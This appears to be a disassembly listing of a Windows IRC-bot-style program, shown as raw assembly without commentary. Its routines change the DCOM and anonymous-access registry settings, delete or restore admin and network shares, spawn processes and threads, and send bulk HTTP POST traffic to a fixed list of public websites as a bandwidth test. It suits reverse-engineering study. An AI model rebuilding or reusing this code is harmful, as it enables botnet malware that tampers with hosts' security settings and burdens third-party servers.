call edi ; GetCurrentProcess
push eax
call ds:dword_42B098 ; DuplicateHandle
test eax, eax
jz short loc_41CAD2
push 10h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_41E5F0
push 44h
pop edi
push edi
lea eax, [ebp+var_74]
push esi
push eax
call sub_41E5F0
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
push esi
mov ebx, offset byte_42B633
push ebx
lea eax, [ebp+var_178]
push eax
mov [ebp+var_74], edi
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_42B008 ; CreateProcessA
test eax, eax
jnz short loc_41CADA
loc_41CAD2: ; CODE XREF: sub_41C9D4+60�j
; sub_41C9D4+77�j ...
or eax, 0FFFFFFFFh
jmp loc_41CB88
; ---------------------------------------------------------------------------
loc_41CADA: ; CODE XREF: sub_41C9D4+FC�j
push [ebp+var_4]
mov edi, ds:dword_42B004
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov ds:dword_4E277C, eax
mov eax, [ebp+var_8]
mov ds:dword_4E2778, eax
mov eax, [ebp+var_2C]
mov ds:dword_4E27B4, eax
call edi ; CloseHandle
cmp [ebp+arg_4], esi
mov eax, [ebp+arg_0]
mov ds:dword_4E2774, eax
jz short loc_41CB14
push [ebp+arg_4]
jmp short loc_41CB15
; ---------------------------------------------------------------------------
loc_41CB14: ; CODE XREF: sub_41C9D4+139�j
push ebx
loc_41CB15: ; CODE XREF: sub_41C9D4+13E�j
push offset dword_4E2780
call sub_41E6A6
pop ecx
pop ecx
push esi
push 0Ah
push offset dword_438AE4
call sub_40AE85
mov ecx, [ebp+var_24]
mov edi, eax
imul edi, 234h
add esp, 0Ch
mov ds:dword_4444F0[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset loc_41C87C
push esi
push esi
call ds:dword_42B03C ; CreateThread
cmp eax, esi
mov ds:dword_4444FC[edi], eax
jnz short loc_41CB86
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_378]
push offset unk_438AB0
push eax
call sub_41E6A6
lea eax, [ebp+var_378]
push eax
call sub_417D70
add esp, 10h
loc_41CB86: ; CODE XREF: sub_41C9D4+189�j
xor eax, eax
loc_41CB88: ; CODE XREF: sub_41C9D4+101�j
pop edi
pop ebx
loc_41CB8A: ; CODE XREF: sub_41C9D4+32�j
pop esi
leave
retn
sub_41C9D4 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp ds:dword_444274, edi
jnz loc_41CCBB
lea eax, [ebp-4]
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call ds:dword_444238 ; RegOpenKeyExA
test eax, eax
jnz short loc_41CC14
lea eax, [ebp-6]
push eax
mov word ptr [ebp-6], 4Eh
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp-6]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push dword ptr [ebp-4]
call ds:dword_4440E4 ; RegSetValueExA
test eax, eax
lea eax, [ebp-214h]
jz short loc_41CBFC
push offset dword_438D60
jmp short loc_41CC01
; ---------------------------------------------------------------------------
loc_41CBFC: ; CODE XREF: seg000:0041CBF3�j
push offset dword_438D40
loc_41CC01: ; CODE XREF: seg000:0041CBFA�j
push eax
call sub_41E6A6
pop ecx
pop ecx
push dword ptr [ebp-4]
call ds:dword_4441E8 ; RegCloseKey
jmp short loc_41CC27
; ---------------------------------------------------------------------------
loc_41CC14: ; CODE XREF: seg000:0041CBC3�j
lea eax, [ebp-214h]
push offset dword_438D10
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_41CC27: ; CODE XREF: seg000:0041CC12�j
cmp [ebp+14h], edi
jnz short loc_41CC46
push 1
push dword ptr [ebp+10h]
lea eax, [ebp-214h]
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40123B
add esp, 14h
loc_41CC46: ; CODE XREF: seg000:0041CC2A�j
lea eax, [ebp-214h]
push eax
call sub_417D70
pop ecx
lea eax, [ebp-4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call ds:dword_444238 ; RegOpenKeyExA
test eax, eax
jnz short loc_41CCB4
push 4
lea eax, [ebp-8]
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push dword ptr [ebp-4]
mov dword ptr [ebp-8], 1
call ds:dword_4440E4 ; RegSetValueExA
test eax, eax
lea eax, [ebp-214h]
jz short loc_41CC9C
push offset dword_438CC0
jmp short loc_41CCA1
; ---------------------------------------------------------------------------
loc_41CC9C: ; CODE XREF: seg000:0041CC93�j
push offset dword_438C8C
loc_41CCA1: ; CODE XREF: seg000:0041CC9A�j
push eax
call sub_41E6A6
pop ecx
pop ecx
push dword ptr [ebp-4]
call ds:dword_4441E8 ; RegCloseKey
jmp short loc_41CCCE
; ---------------------------------------------------------------------------
loc_41CCB4: ; CODE XREF: seg000:0041CC6B�j
push offset dword_438C50
jmp short loc_41CCC0
; ---------------------------------------------------------------------------
loc_41CCBB: ; CODE XREF: seg000:0041CBA0�j
push offset dword_438C20
loc_41CCC0: ; CODE XREF: seg000:0041CCB9�j
lea eax, [ebp-214h]
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_41CCCE: ; CODE XREF: seg000:0041CCB2�j
cmp [ebp+14h], edi
jnz short loc_41CCED
push 1
push dword ptr [ebp+10h]
lea eax, [ebp-214h]
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40123B
add esp, 14h
loc_41CCED: ; CODE XREF: seg000:0041CCD1�j
lea eax, [ebp-214h]
push eax
call sub_417D70
cmp ds:dword_44429C, edi
pop ecx
jnz loc_41CE6A
mov [ebp-4], edi
mov [ebp-14h], edi
mov [ebp-0Ch], edi
push ebx
loc_41CD10: ; CODE XREF: seg000:0041CE4E�j
lea eax, [ebp-0Ch]
push eax
lea eax, [ebp-14h]
push eax
lea eax, [ebp-4]
push eax
push 0FFFFFFFFh
lea eax, [ebp-8]
push eax
push 1F6h
push edi
call ds:dword_44420C
cmp eax, edi
mov [ebp-10h], eax
jz short loc_41CDAF
cmp eax, 0EAh
jz short loc_41CDAF
xor esi, esi
loc_41CD3E: ; CODE XREF: seg000:0041CDA8�j
push ds:off_4434C0[esi]
push edi
call sub_41B8EE
pop ecx
pop ecx
push ds:off_4434C0[esi]
test eax, eax
lea eax, [ebp-214h]
jnz short loc_41CD63
push offset dword_438BFC
jmp short loc_41CD68
; ---------------------------------------------------------------------------
loc_41CD63: ; CODE XREF: seg000:0041CD5A�j
push offset dword_438BD0
loc_41CD68: ; CODE XREF: seg000:0041CD61�j
push 200h
push eax
call sub_41E6FE
add esp, 10h
cmp [ebp+14h], edi
jnz short loc_41CD95
push 1
push dword ptr [ebp+10h]
lea eax, [ebp-214h]
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40123B
add esp, 14h
loc_41CD95: ; CODE XREF: seg000:0041CD79�j
lea eax, [ebp-214h]
push eax
call sub_417D70
add esi, 8
cmp esi, 20h
pop ecx
jb short loc_41CD3E
jmp loc_41CE47
; ---------------------------------------------------------------------------
loc_41CDAF: ; CODE XREF: seg000:0041CD33�j
; seg000:0041CD3A�j
mov esi, [ebp-8]
xor ebx, ebx
inc ebx
cmp [ebp-4], ebx
jb loc_41CE3E
loc_41CDBE: ; CODE XREF: seg000:0041CE3A�j
mov edi, [esi]
push edi
call sub_4206A3
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_41CE33
push edi
call sub_41B802
push eax
push 0
call sub_41B8EE
add esp, 0Ch
push dword ptr [esi]
test eax, eax
lea eax, [ebp-214h]
jnz short loc_41CDF3
push offset dword_438BAC
jmp short loc_41CDF8
; ---------------------------------------------------------------------------
loc_41CDF3: ; CODE XREF: seg000:0041CDEA�j
push offset dword_438B80
loc_41CDF8: ; CODE XREF: seg000:0041CDF1�j
push 200h
push eax
call sub_41E6FE
add esp, 10h
cmp dword ptr [ebp+14h], 0
jnz short loc_41CE26
push 1
push dword ptr [ebp+10h]
lea eax, [ebp-214h]
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40123B
add esp, 14h
loc_41CE26: ; CODE XREF: seg000:0041CE0A�j
lea eax, [ebp-214h]
push eax
call sub_417D70
pop ecx
loc_41CE33: ; CODE XREF: seg000:0041CDCD�j
add esi, 28h
inc ebx
cmp ebx, [ebp-4]
jbe short loc_41CDBE
xor edi, edi
loc_41CE3E: ; CODE XREF: seg000:0041CDB8�j
push dword ptr [ebp-8]
call ds:dword_444140
loc_41CE47: ; CODE XREF: seg000:0041CDAA�j
cmp dword ptr [ebp-10h], 0EAh
jz loc_41CD10
lea eax, [ebp-214h]
push offset dword_438B58
push eax
call sub_41E6A6
pop ecx
pop ecx
pop ebx
jmp short loc_41CE7D
; ---------------------------------------------------------------------------
loc_41CE6A: ; CODE XREF: seg000:0041CD00�j
lea eax, [ebp-214h]
push offset dword_438B28
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_41CE7D: ; CODE XREF: seg000:0041CE68�j
cmp [ebp+14h], edi
jnz short loc_41CE9B
push edi
push dword ptr [ebp+10h]
lea eax, [ebp-214h]
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40123B
add esp, 14h
loc_41CE9B: ; CODE XREF: seg000:0041CE80�j
lea eax, [ebp-214h]
push eax
call sub_417D70
pop ecx
xor eax, eax
pop edi
inc eax
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp ds:dword_444274, ebx
push esi
jnz loc_41CFD9
lea eax, [ebp-4]
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call ds:dword_444238 ; RegOpenKeyExA
test eax, eax
jnz short loc_41CF36
lea eax, [ebp-6]
push eax
mov word ptr [ebp-6], 59h
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp-6]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push dword ptr [ebp-4]
call ds:dword_4440E4 ; RegSetValueExA
test eax, eax
lea eax, [ebp-220h]
jz short loc_41CF1E
push offset dword_438ED8
jmp short loc_41CF23
; ---------------------------------------------------------------------------
loc_41CF1E: ; CODE XREF: seg000:0041CF15�j
push offset dword_438EBC
loc_41CF23: ; CODE XREF: seg000:0041CF1C�j
push eax
call sub_41E6A6
pop ecx
pop ecx
push dword ptr [ebp-4]
call ds:dword_4441E8 ; RegCloseKey
jmp short loc_41CF49
; ---------------------------------------------------------------------------
loc_41CF36: ; CODE XREF: seg000:0041CEE5�j
lea eax, [ebp-220h]
push offset dword_438D10
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_41CF49: ; CODE XREF: seg000:0041CF34�j
cmp [ebp+14h], ebx
jnz short loc_41CF68
push 1
push dword ptr [ebp+10h]
lea eax, [ebp-220h]
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40123B
add esp, 14h
loc_41CF68: ; CODE XREF: seg000:0041CF4C�j
lea eax, [ebp-220h]
push eax
call sub_417D70
pop ecx
lea eax, [ebp-4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call ds:dword_444238 ; RegOpenKeyExA
test eax, eax
jnz short loc_41CFD2
push 4
lea eax, [ebp-8]
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push dword ptr [ebp-4]
mov [ebp-8], ebx
call ds:dword_4440E4 ; RegSetValueExA
test eax, eax
lea eax, [ebp-220h]
jz short loc_41CFBA
push offset dword_438E7C
jmp short loc_41CFBF
; ---------------------------------------------------------------------------
loc_41CFBA: ; CODE XREF: seg000:0041CFB1�j
push offset dword_438E44
loc_41CFBF: ; CODE XREF: seg000:0041CFB8�j
push eax
call sub_41E6A6
pop ecx
pop ecx
push dword ptr [ebp-4]
call ds:dword_4441E8 ; RegCloseKey
jmp short loc_41CFEC
; ---------------------------------------------------------------------------
loc_41CFD2: ; CODE XREF: seg000:0041CF8D�j
push offset dword_438E08
jmp short loc_41CFDE
; ---------------------------------------------------------------------------
loc_41CFD9: ; CODE XREF: seg000:0041CEC2�j
push offset dword_438C20
loc_41CFDE: ; CODE XREF: seg000:0041CFD7�j
lea eax, [ebp-220h]
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_41CFEC: ; CODE XREF: seg000:0041CFD0�j
cmp [ebp+14h], ebx
jnz short loc_41D00B
push 1
push dword ptr [ebp+10h]
lea eax, [ebp-220h]
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40123B
add esp, 14h
loc_41D00B: ; CODE XREF: seg000:0041CFEF�j
lea eax, [ebp-220h]
push eax
call sub_417D70
cmp ds:dword_44429C, ebx
pop ecx
jnz loc_41D17E
push edi
xor esi, esi
mov edi, 200h
loc_41D02C: ; CODE XREF: seg000:0041D099�j
push ds:dword_4434C4[esi]
push ds:off_4434C0[esi]
push ebx
call sub_41B883
add esp, 0Ch
push ds:off_4434C0[esi]
test eax, eax
lea eax, [ebp-220h]
jnz short loc_41D058
push offset dword_438DE8
jmp short loc_41D05D
; ---------------------------------------------------------------------------
loc_41D058: ; CODE XREF: seg000:0041D04F�j
push offset dword_438DC0
loc_41D05D: ; CODE XREF: seg000:0041D056�j
push edi
push eax
call sub_41E6FE
add esp, 10h
cmp [ebp+14h], ebx
jnz short loc_41D086
push 1
push dword ptr [ebp+10h]
lea eax, [ebp-220h]
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40123B
add esp, 14h
loc_41D086: ; CODE XREF: seg000:0041D06A�j
lea eax, [ebp-220h]
push eax
call sub_417D70
add esi, 8
cmp esi, 10h
pop ecx
jb short loc_41D02C
call ds:dword_42B130 ; GetLogicalDrives
test eax, eax
mov [ebp-4], eax
mov bl, 41h
jz loc_41D166
loc_41D0AE: ; CODE XREF: seg000:0041D160�j
test byte ptr [ebp-4], 1
jz loc_41D15B
cmp bl, 41h
jz loc_41D15B
movsx esi, bl
push esi
push offset aC_1 ; "%c$"
lea eax, [ebp-14h]
push 0Ah
push eax
call sub_41E6FE
push esi
push offset aC_0 ; "%c:\\"
lea eax, [ebp-20h]
push 0Ah
push eax
call sub_41E6FE
add esp, 20h
lea eax, [ebp-20h]
push eax
call ds:dword_44407C ; GetDriveTypeA
cmp eax, 3
jnz short loc_41D15B
lea eax, [ebp-20h]
push eax
lea eax, [ebp-14h]
push eax
push 0
call sub_41B883
add esp, 0Ch
test eax, eax
lea eax, [ebp-14h]
push eax
lea eax, [ebp-220h]
jnz short loc_41D11F
push offset dword_438DE8
jmp short loc_41D124
; ---------------------------------------------------------------------------
loc_41D11F: ; CODE XREF: seg000:0041D116�j
push offset dword_438DC0
loc_41D124: ; CODE XREF: seg000:0041D11D�j
push edi
push eax
call sub_41E6FE
add esp, 10h
cmp dword ptr [ebp+14h], 0
jnz short loc_41D14E
push 1
push dword ptr [ebp+10h]
lea eax, [ebp-220h]
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40123B
add esp, 14h
loc_41D14E: ; CODE XREF: seg000:0041D132�j
lea eax, [ebp-220h]
push eax
call sub_417D70
pop ecx
loc_41D15B: ; CODE XREF: seg000:0041D0B2�j
; seg000:0041D0BB�j ...
inc bl
shr dword ptr [ebp-4], 1
jnz loc_41D0AE
loc_41D166: ; CODE XREF: seg000:0041D0A8�j
lea eax, [ebp-220h]
push offset dword_438D90
push eax
call sub_41E6A6
pop ecx
pop ecx
xor ebx, ebx
pop edi
jmp short loc_41D191
; ---------------------------------------------------------------------------
loc_41D17E: ; CODE XREF: seg000:0041D01E�j
lea eax, [ebp-220h]
push offset dword_438B28
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_41D191: ; CODE XREF: seg000:0041D17C�j
cmp [ebp+14h], ebx
jnz short loc_41D1AF
push ebx
push dword ptr [ebp+10h]
lea eax, [ebp-220h]
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40123B
add esp, 14h
loc_41D1AF: ; CODE XREF: seg000:0041D194�j
lea eax, [ebp-220h]
push eax
call sub_417D70
pop ecx
xor eax, eax
pop esi
inc eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
aUnlMbS_0 db 'Ul$Œì˜',0 ; DATA XREF: sub_40274D+2BEC�o
dd 458B0000h, 6A57567Ch, 0F08B5926h, 0F3DC7D8Dh, 647D83A5h
dd 6C75FF00h, 9480C7h, 10000h, 75FF0000h, 0E0458D68h, 0DC75FF50h
dd 8EE80774h, 0EBFFFFF9h, 0FCA9E805h, 0C483FFFFh, 6075FF10h
dd 0FEDF38E8h, 6A59FFh, 0B06815FFh
db 42h, 0, 0CCh
; =============== S U B R O U T I N E =======================================
sub_41D21B proc near ; CODE XREF: sub_41D41B+CB�p
; sub_41D41B+DD�p ...
arg_0 = dword ptr 4
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
call sub_41ECDE
cdq
idiv [esp+arg_0]
mov eax, edx
retn
sub_41D21B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D235 proc near ; CODE XREF: sub_41D41B+D4�p
; sub_41D41B+E6�p ...
var_34 = dword ptr -34h
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push esi
push [ebp+arg_0]
call sub_41E1C0
mov esi, 0FFh
cmp eax, esi
pop ecx
ja short loc_41D2A5
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_41E5F0
push [ebp+arg_0]
mov [ebp+var_28], 2
call sub_4022BD
add esp, 10h
test eax, eax
mov [ebp+var_24], eax
jz short loc_41D2A5
push 50h
call ds:dword_444260 ; htons
push 6
push 1
push 2
mov [ebp+var_26], ax
call ds:dword_444100 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz short loc_41D2A5
push 10h
lea ecx, [ebp+var_28]
push ecx
push eax
call ds:dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_41D2AC
loc_41D2A5: ; CODE XREF: sub_41D235+17�j
; sub_41D235+3C�j ...
xor eax, eax
jmp loc_41D3FB
; ---------------------------------------------------------------------------
loc_41D2AC: ; CODE XREF: sub_41D235+6E�j
push ebx
push edi
push 32003h
call sub_41FEB2
mov edi, ds:dword_42B038
mov ebx, eax
pop ecx
mov [ebp+var_C], ebx
call edi ; GetTickCount
push eax
call sub_41ECD4
call sub_41ECDE
cdq
idiv esi
mov [esp+34h+var_34], 32001h
push 0
push ebx
movsx esi, dl
call sub_41E5F0
push 32000h
push esi
push ebx
call sub_41E5F0
push ebx
call sub_41E1C0
push 323EAh
mov ebx, eax
call sub_41FEB2
push ebx
push [ebp+arg_0]
mov esi, eax
push offset aPostHttp1_0Hos ; "POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
push esi
call sub_41E6A6
push [ebp+var_C]
push esi
call sub_41EED0
push offset asc_4348E8 ; "\r\n"
push esi
call sub_41EED0
add esp, 40h
push esi
call sub_41E1C0
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
call edi ; GetTickCount
mov [ebp+var_18], eax
xor eax, eax
test ebx, ebx
mov [ebp+var_8], eax
jbe short loc_41D387
mov [ebp+var_10], ebx
mov ebx, 400h
jmp short loc_41D353
; ---------------------------------------------------------------------------
loc_41D350: ; CODE XREF: sub_41D235+150�j
mov eax, [ebp+var_8]
loc_41D353: ; CODE XREF: sub_41D235+119�j
mov ecx, [ebp+var_14]
sub ecx, eax
add eax, esi
cmp ecx, ebx
push 0
jnb short loc_41D365
push [ebp+var_10]
jmp short loc_41D366
; ---------------------------------------------------------------------------
loc_41D365: ; CODE XREF: sub_41D235+129�j
push ebx
loc_41D366: ; CODE XREF: sub_41D235+12E�j
push eax
push [ebp+var_4]
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_41D3FE
add [ebp+var_8], ebx
mov eax, [ebp+var_8]
sub [ebp+var_10], ebx
cmp eax, [ebp+var_14]
jb short loc_41D350
loc_41D387: ; CODE XREF: sub_41D235+10F�j
call edi ; GetTickCount
sub eax, [ebp+var_18]
test eax, eax
mov [ebp+var_18], eax
fild [ebp+var_18]
jge short loc_41D39C
fadd ds:flt_438F0C
loc_41D39C: ; CODE XREF: sub_41D235+15F�j
fmul ds:flt_438F08
fstp [ebp+var_10]
fld ds:flt_438F04
fld [ebp+var_10]
fucompp
fnstsw ax
test ah, 44h
jp short loc_41D3BC
fld1
fstp [ebp+var_10]
loc_41D3BC: ; CODE XREF: sub_41D235+180�j
push [ebp+var_4]
call ds:dword_444218 ; closesocket
push [ebp+var_C]
call sub_41E2A1
push esi
call sub_41E2A1
fild [ebp+var_14]
mov eax, [ebp+var_14]
test eax, eax
pop ecx
pop ecx
jge short loc_41D3E5
fadd ds:flt_438F0C
loc_41D3E5: ; CODE XREF: sub_41D235+1A8�j
fdiv [ebp+var_10]
fmul ds:flt_438F00
fmul ds:flt_438EFC
call sub_41FE38
loc_41D3F9: ; CODE XREF: sub_41D235+1E4�j
pop edi
pop ebx
loc_41D3FB: ; CODE XREF: sub_41D235+72�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41D3FE: ; CODE XREF: sub_41D235+13E�j
push [ebp+var_4]
call ds:dword_444218 ; closesocket
push [ebp+var_C]
call sub_41E2A1
push esi
call sub_41E2A1
pop ecx
pop ecx
xor eax, eax
jmp short loc_41D3F9
sub_41D235 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D41B proc near ; CODE XREF: sub_40274D+2C3E�p
var_26C = byte ptr -26Ch
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 26Ch
push ebx
push esi
push edi
push 8
mov [ebp+var_4], 3
mov [ebp+var_3C], offset aWww_schlund_ne ; "www.schlund.net"
mov [ebp+var_38], offset aWww_utwente_nl ; "www.utwente.nl"
mov [ebp+var_34], offset aVerio_fr ; "verio.fr"
mov [ebp+var_30], offset aWww_1und1_de ; "www.1und1.de"
mov [ebp+var_2C], offset aWww_switch_ch ; "www.switch.ch"
mov [ebp+var_28], offset aWww_belwue_de ; "www.belwue.de"
mov [ebp+var_24], offset aDe_yahoo_com ; "de.yahoo.com"
mov [ebp+var_20], offset aWww_google_it ; "www.google.it"
mov [ebp+var_6C], offset aWww_xo_net ; "www.xo.net"
mov [ebp+var_68], offset aWww_stanford_e ; "www.stanford.edu"
mov [ebp+var_64], offset aWww_verio_com ; "www.verio.com"
mov [ebp+var_60], offset aWww_nocster_co ; "www.nocster.com"
mov [ebp+var_5C], offset aWww_rit_edu ; "www.rit.edu"
mov [ebp+var_58], offset aWww_cogentco_c ; "www.cogentco.com"
mov [ebp+var_54], offset aWww_burst_net ; "www.burst.net"
mov [ebp+var_50], offset aNitro_ucsc_edu ; "nitro.ucsc.edu"
mov [ebp+var_4C], offset aWww_level3_com ; "www.level3.com"
mov [ebp+var_48], offset aWww_above_net ; "www.above.net"
mov [ebp+var_44], offset aWww_easynews_c ; "www.easynews.com"
mov [ebp+var_40], offset aWww_google_com ; "www.google.com"
mov [ebp+var_1C], offset aWww_lib_nthu_e ; "www.lib.nthu.edu.tw"
mov [ebp+var_18], offset aWww_st_lib_kei ; "www.st.lib.keio.ac.jp"
mov [ebp+var_14], offset aWww_d1asia_com ; "www.d1asia.com"
mov [ebp+var_10], offset aWww_nifty_com ; "www.nifty.com"
mov [ebp+var_C], offset aYahoo_co_jp ; "yahoo.co.jp"
mov [ebp+var_8], offset aWww_google_co_ ; "www.google.co.jp"
call sub_41D21B
push [ebp+eax*4+var_3C]
call sub_41D235
push 8
mov esi, eax
call sub_41D21B
push [ebp+eax*4+var_3C]
call sub_41D235
add esp, 10h
test esi, esi
jz short loc_41D51C
test eax, eax
jz short loc_41D518
lea ebx, [eax+esi]
shr ebx, 1
jmp short loc_41D51E
; ---------------------------------------------------------------------------
loc_41D518: ; CODE XREF: sub_41D41B+F4�j
mov ebx, esi
jmp short loc_41D51E
; ---------------------------------------------------------------------------
loc_41D51C: ; CODE XREF: sub_41D41B+F0�j
mov ebx, eax
loc_41D51E: ; CODE XREF: sub_41D41B+FB�j
; sub_41D41B+FF�j
push 0Ch
call sub_41D21B
push [ebp+eax*4+var_6C]
call sub_41D235
push 0Ch
mov edi, eax
call sub_41D21B
push [ebp+eax*4+var_6C]
call sub_41D235
add esp, 10h
test edi, edi
jz short loc_41D556
test eax, eax
jz short loc_41D552
lea esi, [eax+edi]
shr esi, 1
jmp short loc_41D558
; ---------------------------------------------------------------------------
loc_41D552: ; CODE XREF: sub_41D41B+12E�j
mov esi, edi
jmp short loc_41D558
; ---------------------------------------------------------------------------
loc_41D556: ; CODE XREF: sub_41D41B+12A�j
mov esi, eax
loc_41D558: ; CODE XREF: sub_41D41B+135�j
; sub_41D41B+139�j
push 6
call sub_41D21B
push [ebp+eax*4+var_1C]
call sub_41D235
push 6
mov edi, eax
call sub_41D21B
push [ebp+eax*4+var_1C]
call sub_41D235
add esp, 10h
test edi, edi
jz short loc_41D590
test eax, eax
jz short loc_41D58C
lea ecx, [eax+edi]
shr ecx, 1
jmp short loc_41D592
; ---------------------------------------------------------------------------
loc_41D58C: ; CODE XREF: sub_41D41B+168�j
mov ecx, edi
jmp short loc_41D592
; ---------------------------------------------------------------------------
loc_41D590: ; CODE XREF: sub_41D41B+164�j
mov ecx, eax
loc_41D592: ; CODE XREF: sub_41D41B+16F�j
; sub_41D41B+173�j
xor eax, eax
test ebx, ebx
jz short loc_41D59F
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_41D5A2
; ---------------------------------------------------------------------------
loc_41D59F: ; CODE XREF: sub_41D41B+17B�j
push 2
pop edi
loc_41D5A2: ; CODE XREF: sub_41D41B+182�j
test esi, esi
jz short loc_41D5AA
add eax, esi
jmp short loc_41D5AB
; ---------------------------------------------------------------------------
loc_41D5AA: ; CODE XREF: sub_41D41B+189�j
dec edi
loc_41D5AB: ; CODE XREF: sub_41D41B+18D�j
test ecx, ecx
jz short loc_41D5B3
add eax, ecx
jmp short loc_41D5B4
; ---------------------------------------------------------------------------
loc_41D5B3: ; CODE XREF: sub_41D41B+192�j
dec edi
loc_41D5B4: ; CODE XREF: sub_41D41B+196�j
xor edx, edx
div edi
push eax
push ecx
push esi
push ebx
lea eax, [ebp+var_26C]
push offset dword_438F48
push eax
call sub_41E6A6
push 0
push [ebp+arg_8]
lea eax, [ebp+var_26C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
lea eax, [ebp+var_26C]
push eax
call sub_417D70
add esp, 30h
pop edi
pop esi
pop ebx
leave
retn
sub_41D41B endp
; =============== S U B R O U T I N E =======================================
sub_41D5F8 proc near ; CODE XREF: sub_40274D+23AA�p
; sub_40274D+27E2�p ...
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_42B038 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
mov ecx, 15180h
mov esi, 0E10h
push 3Ch
pop edi
sub eax, [esp+8+arg_0]
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
mov esi, eax
mov eax, edx
xor edx, edx
div edi
push eax
push esi
push ecx
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
mov esi, offset dword_4E27B8
push esi
call sub_41E6FE
add esp, 18h
pop edi
mov eax, esi
pop esi
retn
sub_41D5F8 endp
; ---------------------------------------------------------------------------
aUnlIbF db 'Ul$ˆì”',0
dd 8D560000h, 3350E445h, 0E445C7F6h, 94h, 0B06415FFh, 0C0850042h
dd 7D834D74h, 297504E8h, 75EC7539h, 0F47D8312h, 46017501h
dd 2F47D83h, 0F6333575h, 8330EB46h, 750AEC7Dh, 0EB026A04h
dd 0EC7D8325h, 0EB20755Ah, 0E87D8311h, 39187505h, 0E974EC75h
dd 1EC7D83h, 36A0475h, 7D8308EBh, 37502ECh, 8B5E076Ah
dd 0C5835EC6h
db 78h, 0C9h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_41D6C3 proc near ; CODE XREF: sub_41D779+245�p
push ebx
push esi
push edi
mov edi, 0F4240h
